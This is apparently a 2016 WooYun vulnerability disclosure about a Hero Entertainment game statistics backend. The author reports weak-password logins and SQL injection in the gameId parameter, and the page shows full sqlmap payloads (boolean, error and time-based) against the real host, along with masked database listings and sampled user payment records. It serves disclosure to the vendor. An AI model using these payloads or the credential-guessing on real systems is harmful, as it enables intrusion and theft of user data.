当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169183

漏洞标题:英雄互娱某站后台SQL注入(涉及某枪战游戏用户数据数量具体不详)

相关厂商:英雄互娱

漏洞作者: mango

提交时间:2016-01-11 19:12

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-11: 细节已通知厂商并且等待厂商处理中
2016-01-13: 厂商已经确认,细节仅向厂商公开
2016-01-23: 细节向核心白帽子及相关领域专家公开
2016-02-02: 细节向普通白帽子公开
2016-02-12: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

走小厂商 - - 之前getshell 也就2rank 哎 (里面某些信息还望管理员打码~)

详细说明:

在对http://idk.yingxiong.com/ 进行爆破的时候 存在一下弱口令

mask 区域
*****@yingxi*****
*****ng@ying*****
*****@yingx*****
*****ngxion*****
*****yingxi*****
*****ingxio*****
*****xiong*****
*****gxiong*****
*****yingxi*****
*****g@yingx*****


密码都是 123456

WKD45GYHI[$QZ07(0WZ~[0B.png


然后发现是一些统计后台~ 那就试试有没有注入

漏洞证明:

http://idk.yingxiong.com:80/players/retained?gameId=131&type=0&begintime=2015%2F10%2F13&endtime=2016%2F01%2F11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1 (GET)


R(ST())ML35JHWYOEL2$@06.png


sqlmap identified the following injection points with a total of 71 HTTP(s) requests:
---
Parameter: gameId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: gameId=131 AND 1182=1182-- wnlV&type=0&begintime=2015/10/13&endtime=2016/01/11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: gameId=131 AND (SELECT 8411 FROM(SELECT COUNT(*),CONCAT(0x71706a7071,(SELECT (ELT(8411=8411,1))),0x716b6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- XyAs&type=0&begintime=2015/10/13&endtime=2016/01/11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: gameId=131 AND (SELECT * FROM (SELECT(SLEEP(5)))OZKq)-- gFhL&type=0&begintime=2015/10/13&endtime=2016/01/11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: gameId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: gameId=131 AND 1182=1182-- wnlV&type=0&begintime=2015/10/13&endtime=2016/01/11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: gameId=131 AND (SELECT 8411 FROM(SELECT COUNT(*),CONCAT(0x71706a7071,(SELECT (ELT(8411=8411,1))),0x716b6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- XyAs&type=0&begintime=2015/10/13&endtime=2016/01/11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: gameId=131 AND (SELECT * FROM (SELECT(SLEEP(5)))OZKq)-- gFhL&type=0&begintime=2015/10/13&endtime=2016/01/11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1
---
back-end DBMS: MySQL 5.0
available databases [10]:
mask 区域
***** i*****
*****tion_s*****
***** k*****
*****uxi*****
*****ysq*****
*****ance_s*****
*****ngzh*****
***** s*****
*****tat*****
***** t*****


其中发现qiangzhan数据库下存有很多不名表

mask 区域
*****gin_201*****
*****gin_201*****
*****gin_201*****
*****gin_201*****
*****gin_201*****
*****gin_201*****
*****gin_201*****
*****gin_201*****
*****gin_201*****
*****gin_201*****
*****gin_201*****
*****gin_201*****
*****gin_201*****
*****gin_201*****
*****gin_201*****
*****gin_201*****
*****gin_201*****
*****gin_201*****
*****gin_201*****
*****gin_201*****
*****gin_201*****
***** *****


随机注入出一部分数据看看

9Z726@ZRU_P9RH80]XMWU%T.png


再来看看user_pay 是用户的充值记录 随机抽取100条看看

OJ$%L%R@X{ZN@X7~7]{(IKO.png


修复方案:

版权声明:转载请注明来源 mango@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-01-13 14:22

厂商回复:

感谢,已经确认漏洞

最新状态:

暂无


漏洞评价:

评价

  1. 2016-01-11 19:18 | 天地不仁 以万物为刍狗 ( 普通白帽子 | Rank:1211 漏洞数:335 | 本乌云账户唯一QQ 177712xx4)

    得了吧···我的都走了小厂商···怎么你就首页了···

  2. 2016-01-11 19:23 | 红客十年 ( 普通白帽子 | Rank:376 漏洞数:76 | 去年离职富士康,回到家中上蓝翔,蓝翔毕业...)

    卧槽,我也在玩。。。

  3. 2016-01-11 20:03 | mango ( 核心白帽子 | Rank:1868 漏洞数:275 | 出一份微不足道的"力")

    @天地不仁 以万物为刍狗 我之前那个getshell走错了 所以这个走大

  4. 2016-01-12 16:26 | dslxin ( 普通白帽子 | Rank:136 漏洞数:35 | 岁月你别催)

    我的走的大厂商